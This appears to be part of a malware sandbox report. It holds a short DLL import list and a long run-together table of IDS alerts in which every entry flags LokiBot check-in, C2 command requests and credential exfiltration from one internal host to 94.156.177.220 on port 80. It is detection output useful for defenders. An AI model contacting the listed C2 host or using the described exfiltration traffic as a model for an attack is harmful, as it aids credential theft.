                                  KERNEL32.dllGetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                                  ole32.dllCoCreateInstance, CoInitialize, CoUninitialize
                                  OLEAUT32.dllVariantInit, SysFreeString, SysAllocString
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-25T10:20:01.424022+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973094.156.177.22080TCP
                                  2024-10-25T10:20:01.424022+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973094.156.177.22080TCP
                                  2024-10-25T10:20:01.424022+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973094.156.177.22080TCP
                                  2024-10-25T10:20:02.412267+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973094.156.177.22080TCP
                                  2024-10-25T10:20:03.047948+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973194.156.177.22080TCP
                                  2024-10-25T10:20:03.047948+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973194.156.177.22080TCP
                                  2024-10-25T10:20:03.047948+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973194.156.177.22080TCP
                                  2024-10-25T10:20:04.020146+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973194.156.177.22080TCP
                                  2024-10-25T10:20:04.092936+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973294.156.177.22080TCP
                                  2024-10-25T10:20:04.092936+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973294.156.177.22080TCP
                                  2024-10-25T10:20:04.092936+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973294.156.177.22080TCP
                                  2024-10-25T10:20:05.061102+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973294.156.177.22080TCP
                                  2024-10-25T10:20:05.061102+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973294.156.177.22080TCP
                                  2024-10-25T10:20:05.071273+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449732TCP
                                  2024-10-25T10:20:05.231108+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973394.156.177.22080TCP
                                  2024-10-25T10:20:05.231108+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973394.156.177.22080TCP
                                  2024-10-25T10:20:05.231108+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973394.156.177.22080TCP
                                  2024-10-25T10:20:06.219416+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973394.156.177.22080TCP
                                  2024-10-25T10:20:06.219416+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973394.156.177.22080TCP
                                  2024-10-25T10:20:06.226237+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449733TCP
                                  2024-10-25T10:20:06.375575+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973494.156.177.22080TCP
                                  2024-10-25T10:20:06.375575+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973494.156.177.22080TCP
                                  2024-10-25T10:20:06.375575+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973494.156.177.22080TCP
                                  2024-10-25T10:20:07.328677+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973494.156.177.22080TCP
                                  2024-10-25T10:20:07.328677+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973494.156.177.22080TCP
                                  2024-10-25T10:20:07.334473+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449734TCP
                                  2024-10-25T10:20:07.485394+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973594.156.177.22080TCP
                                  2024-10-25T10:20:07.485394+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973594.156.177.22080TCP
                                  2024-10-25T10:20:07.485394+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973594.156.177.22080TCP
                                  2024-10-25T10:20:09.431887+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973594.156.177.22080TCP
                                  2024-10-25T10:20:09.431887+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973594.156.177.22080TCP
                                  2024-10-25T10:20:09.432485+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449735TCP
                                  2024-10-25T10:20:09.597188+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973694.156.177.22080TCP
                                  2024-10-25T10:20:09.597188+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973694.156.177.22080TCP
                                  2024-10-25T10:20:09.597188+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973694.156.177.22080TCP
                                  2024-10-25T10:20:10.553813+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973694.156.177.22080TCP
                                  2024-10-25T10:20:10.553813+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973694.156.177.22080TCP
                                  2024-10-25T10:20:10.560448+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449736TCP
                                  2024-10-25T10:20:10.715160+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973794.156.177.22080TCP
                                  2024-10-25T10:20:10.715160+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973794.156.177.22080TCP
                                  2024-10-25T10:20:10.715160+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973794.156.177.22080TCP
                                  2024-10-25T10:20:11.713418+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973794.156.177.22080TCP
                                  2024-10-25T10:20:11.713418+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973794.156.177.22080TCP
                                  2024-10-25T10:20:11.719389+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449737TCP
                                  2024-10-25T10:20:12.310127+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973894.156.177.22080TCP
                                  2024-10-25T10:20:12.310127+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973894.156.177.22080TCP
                                  2024-10-25T10:20:12.310127+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973894.156.177.22080TCP
                                  2024-10-25T10:20:13.293592+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973894.156.177.22080TCP
                                  2024-10-25T10:20:13.293592+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973894.156.177.22080TCP
                                  2024-10-25T10:20:13.299728+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449738TCP
                                  2024-10-25T10:20:13.452612+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973994.156.177.22080TCP
                                  2024-10-25T10:20:13.452612+02002025381ET MALWARE LokiBot Checkin1192.168.2.44973994.156.177.22080TCP
                                  2024-10-25T10:20:13.452612+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973994.156.177.22080TCP
                                  2024-10-25T10:20:14.398997+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973994.156.177.22080TCP
                                  2024-10-25T10:20:14.398997+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973994.156.177.22080TCP
                                  2024-10-25T10:20:14.406009+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449739TCP
                                  2024-10-25T10:20:14.593029+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974094.156.177.22080TCP
                                  2024-10-25T10:20:14.593029+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974094.156.177.22080TCP
                                  2024-10-25T10:20:14.593029+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974094.156.177.22080TCP
                                  2024-10-25T10:20:15.568040+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974094.156.177.22080TCP
                                  2024-10-25T10:20:15.568040+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974094.156.177.22080TCP
                                  2024-10-25T10:20:15.575285+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449740TCP
                                  2024-10-25T10:20:15.751617+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974194.156.177.22080TCP
                                  2024-10-25T10:20:15.751617+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974194.156.177.22080TCP
                                  2024-10-25T10:20:15.751617+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974194.156.177.22080TCP
                                  2024-10-25T10:20:16.716991+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974194.156.177.22080TCP
                                  2024-10-25T10:20:16.716991+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974194.156.177.22080TCP
                                  2024-10-25T10:20:16.722910+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449741TCP
                                  2024-10-25T10:20:16.872789+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974494.156.177.22080TCP
                                  2024-10-25T10:20:16.872789+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974494.156.177.22080TCP
                                  2024-10-25T10:20:16.872789+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974494.156.177.22080TCP
                                  2024-10-25T10:20:17.832440+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974494.156.177.22080TCP
                                  2024-10-25T10:20:17.832440+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974494.156.177.22080TCP
                                  2024-10-25T10:20:17.838629+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449744TCP
                                  2024-10-25T10:20:18.205156+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974794.156.177.22080TCP
                                  2024-10-25T10:20:18.205156+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974794.156.177.22080TCP
                                  2024-10-25T10:20:18.205156+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974794.156.177.22080TCP
                                  2024-10-25T10:20:19.151355+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974794.156.177.22080TCP
                                  2024-10-25T10:20:19.151355+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974794.156.177.22080TCP
                                  2024-10-25T10:20:19.157444+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449747TCP
                                  2024-10-25T10:20:19.310464+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974994.156.177.22080TCP
                                  2024-10-25T10:20:19.310464+02002025381ET MALWARE LokiBot Checkin1192.168.2.44974994.156.177.22080TCP
                                  2024-10-25T10:20:19.310464+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974994.156.177.22080TCP
                                  2024-10-25T10:20:21.110799+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974994.156.177.22080TCP
                                  2024-10-25T10:20:21.110799+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974994.156.177.22080TCP
                                  2024-10-25T10:20:21.112566+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449749TCP
                                  2024-10-25T10:20:21.380407+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975194.156.177.22080TCP
                                  2024-10-25T10:20:21.380407+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975194.156.177.22080TCP
                                  2024-10-25T10:20:21.380407+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975194.156.177.22080TCP
                                  2024-10-25T10:20:22.349091+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975194.156.177.22080TCP
                                  2024-10-25T10:20:22.349091+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975194.156.177.22080TCP
                                  2024-10-25T10:20:22.355060+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449751TCP
                                  2024-10-25T10:20:22.549457+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975294.156.177.22080TCP
                                  2024-10-25T10:20:22.549457+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975294.156.177.22080TCP
                                  2024-10-25T10:20:22.549457+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975294.156.177.22080TCP
                                  2024-10-25T10:20:23.513082+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975294.156.177.22080TCP
                                  2024-10-25T10:20:23.513082+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975294.156.177.22080TCP
                                  2024-10-25T10:20:23.520665+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449752TCP
                                  2024-10-25T10:20:23.684073+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975394.156.177.22080TCP
                                  2024-10-25T10:20:23.684073+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975394.156.177.22080TCP
                                  2024-10-25T10:20:23.684073+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975394.156.177.22080TCP
                                  2024-10-25T10:20:24.651338+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975394.156.177.22080TCP
                                  2024-10-25T10:20:24.651338+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975394.156.177.22080TCP
                                  2024-10-25T10:20:24.657497+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449753TCP
                                  2024-10-25T10:20:24.816660+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975494.156.177.22080TCP
                                  2024-10-25T10:20:24.816660+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975494.156.177.22080TCP
                                  2024-10-25T10:20:24.816660+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975494.156.177.22080TCP
                                  2024-10-25T10:20:25.786050+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975494.156.177.22080TCP
                                  2024-10-25T10:20:25.786050+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975494.156.177.22080TCP
                                  2024-10-25T10:20:25.792079+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449754TCP
                                  2024-10-25T10:20:25.965151+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975594.156.177.22080TCP
                                  2024-10-25T10:20:25.965151+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975594.156.177.22080TCP
                                  2024-10-25T10:20:25.965151+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975594.156.177.22080TCP
                                  2024-10-25T10:20:26.954108+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975594.156.177.22080TCP
                                  2024-10-25T10:20:26.954108+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975594.156.177.22080TCP
                                  2024-10-25T10:20:26.959979+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449755TCP
                                  2024-10-25T10:20:27.717963+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975694.156.177.22080TCP
                                  2024-10-25T10:20:27.717963+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975694.156.177.22080TCP
                                  2024-10-25T10:20:27.717963+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975694.156.177.22080TCP
                                  2024-10-25T10:20:28.695330+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975694.156.177.22080TCP
                                  2024-10-25T10:20:28.695330+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975694.156.177.22080TCP
                                  2024-10-25T10:20:28.701325+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449756TCP
                                  2024-10-25T10:20:29.863609+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975794.156.177.22080TCP
                                  2024-10-25T10:20:29.863609+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975794.156.177.22080TCP
                                  2024-10-25T10:20:29.863609+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975794.156.177.22080TCP
                                  2024-10-25T10:20:30.839601+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975794.156.177.22080TCP
                                  2024-10-25T10:20:30.839601+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975794.156.177.22080TCP
                                  2024-10-25T10:20:30.845454+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449757TCP
                                  2024-10-25T10:20:30.997406+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975894.156.177.22080TCP
                                  2024-10-25T10:20:30.997406+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975894.156.177.22080TCP
                                  2024-10-25T10:20:30.997406+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975894.156.177.22080TCP
                                  2024-10-25T10:20:32.009821+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975894.156.177.22080TCP
                                  2024-10-25T10:20:32.009821+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975894.156.177.22080TCP
                                  2024-10-25T10:20:32.016207+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449758TCP
                                  2024-10-25T10:20:32.176322+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975994.156.177.22080TCP
                                  2024-10-25T10:20:32.176322+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975994.156.177.22080TCP
                                  2024-10-25T10:20:32.176322+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975994.156.177.22080TCP
                                  2024-10-25T10:20:33.139480+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975994.156.177.22080TCP
                                  2024-10-25T10:20:33.139480+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975994.156.177.22080TCP
                                  2024-10-25T10:20:33.145709+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449759TCP
                                  2024-10-25T10:20:33.687799+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976094.156.177.22080TCP
                                  2024-10-25T10:20:33.687799+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976094.156.177.22080TCP
                                  2024-10-25T10:20:33.687799+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976094.156.177.22080TCP
                                  2024-10-25T10:20:34.649766+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976094.156.177.22080TCP
                                  2024-10-25T10:20:34.649766+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976094.156.177.22080TCP
                                  2024-10-25T10:20:34.655827+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449760TCP
                                  2024-10-25T10:20:34.810261+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976194.156.177.22080TCP
                                  2024-10-25T10:20:34.810261+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976194.156.177.22080TCP
                                  2024-10-25T10:20:34.810261+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976194.156.177.22080TCP
                                  2024-10-25T10:20:35.764613+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976194.156.177.22080TCP
                                  2024-10-25T10:20:35.764613+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976194.156.177.22080TCP
                                  2024-10-25T10:20:35.772022+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449761TCP
                                  2024-10-25T10:20:35.916782+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976294.156.177.22080TCP
                                  2024-10-25T10:20:35.916782+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976294.156.177.22080TCP
                                  2024-10-25T10:20:35.916782+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976294.156.177.22080TCP
                                  2024-10-25T10:20:36.884487+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976294.156.177.22080TCP
                                  2024-10-25T10:20:36.884487+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976294.156.177.22080TCP
                                  2024-10-25T10:20:36.891188+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449762TCP
                                  2024-10-25T10:20:37.046303+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976394.156.177.22080TCP
                                  2024-10-25T10:20:37.046303+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976394.156.177.22080TCP
                                  2024-10-25T10:20:37.046303+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976394.156.177.22080TCP
                                  2024-10-25T10:20:38.036103+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976394.156.177.22080TCP
                                  2024-10-25T10:20:38.036103+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976394.156.177.22080TCP
                                  2024-10-25T10:20:38.041870+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449763TCP
                                  2024-10-25T10:20:38.200499+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976494.156.177.22080TCP
                                  2024-10-25T10:20:38.200499+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976494.156.177.22080TCP
                                  2024-10-25T10:20:38.200499+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976494.156.177.22080TCP
                                  2024-10-25T10:20:39.182221+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976494.156.177.22080TCP
                                  2024-10-25T10:20:39.182221+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976494.156.177.22080TCP
                                  2024-10-25T10:20:39.188082+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449764TCP
                                  2024-10-25T10:20:39.822243+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976594.156.177.22080TCP
                                  2024-10-25T10:20:39.822243+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976594.156.177.22080TCP
                                  2024-10-25T10:20:39.822243+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976594.156.177.22080TCP
                                  2024-10-25T10:20:40.795930+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976594.156.177.22080TCP
                                  2024-10-25T10:20:40.795930+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976594.156.177.22080TCP
                                  2024-10-25T10:20:40.802577+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449765TCP
                                  2024-10-25T10:20:40.950583+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976694.156.177.22080TCP
                                  2024-10-25T10:20:40.950583+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976694.156.177.22080TCP
                                  2024-10-25T10:20:40.950583+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976694.156.177.22080TCP
                                  2024-10-25T10:20:42.080957+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976694.156.177.22080TCP
                                  2024-10-25T10:20:42.080957+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976694.156.177.22080TCP
                                  2024-10-25T10:20:42.081150+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449766TCP
                                  2024-10-25T10:20:42.434571+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976794.156.177.22080TCP
                                  2024-10-25T10:20:42.434571+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976794.156.177.22080TCP
                                  2024-10-25T10:20:42.434571+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976794.156.177.22080TCP
                                  2024-10-25T10:20:43.413726+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976794.156.177.22080TCP
                                  2024-10-25T10:20:43.413726+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976794.156.177.22080TCP
                                  2024-10-25T10:20:43.419600+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449767TCP
                                  2024-10-25T10:20:43.576012+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976894.156.177.22080TCP
                                  2024-10-25T10:20:43.576012+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976894.156.177.22080TCP
                                  2024-10-25T10:20:43.576012+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976894.156.177.22080TCP
                                  2024-10-25T10:20:44.566821+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976894.156.177.22080TCP
                                  2024-10-25T10:20:44.566821+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976894.156.177.22080TCP
                                  2024-10-25T10:20:44.573607+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449768TCP
                                  2024-10-25T10:20:44.753726+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976994.156.177.22080TCP
                                  2024-10-25T10:20:44.753726+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976994.156.177.22080TCP
                                  2024-10-25T10:20:44.753726+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976994.156.177.22080TCP
                                  2024-10-25T10:20:45.730458+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976994.156.177.22080TCP
                                  2024-10-25T10:20:45.730458+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976994.156.177.22080TCP
                                  2024-10-25T10:20:45.954002+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449769TCP
                                  2024-10-25T10:20:45.967783+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977094.156.177.22080TCP
                                  2024-10-25T10:20:45.967783+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977094.156.177.22080TCP
                                  2024-10-25T10:20:45.967783+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977094.156.177.22080TCP
                                  2024-10-25T10:20:46.935092+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977094.156.177.22080TCP
                                  2024-10-25T10:20:46.935092+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977094.156.177.22080TCP
                                  2024-10-25T10:20:46.940955+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449770TCP
                                  2024-10-25T10:20:47.090625+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977194.156.177.22080TCP
                                  2024-10-25T10:20:47.090625+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977194.156.177.22080TCP
                                  2024-10-25T10:20:47.090625+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977194.156.177.22080TCP
                                  2024-10-25T10:20:48.041946+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977194.156.177.22080TCP
                                  2024-10-25T10:20:48.041946+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977194.156.177.22080TCP
                                  2024-10-25T10:20:48.048668+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449771TCP
                                  2024-10-25T10:20:48.628754+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977294.156.177.22080TCP
                                  2024-10-25T10:20:48.628754+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977294.156.177.22080TCP
                                  2024-10-25T10:20:48.628754+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977294.156.177.22080TCP
                                  2024-10-25T10:20:49.291568+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977294.156.177.22080TCP
                                  2024-10-25T10:20:49.291568+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977294.156.177.22080TCP
                                  2024-10-25T10:20:49.297262+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449772TCP
                                  2024-10-25T10:20:49.450869+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977394.156.177.22080TCP
                                  2024-10-25T10:20:49.450869+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977394.156.177.22080TCP
                                  2024-10-25T10:20:49.450869+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977394.156.177.22080TCP
                                  2024-10-25T10:20:50.444267+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977394.156.177.22080TCP
                                  2024-10-25T10:20:50.444267+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977394.156.177.22080TCP
                                  2024-10-25T10:20:50.450430+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449773TCP
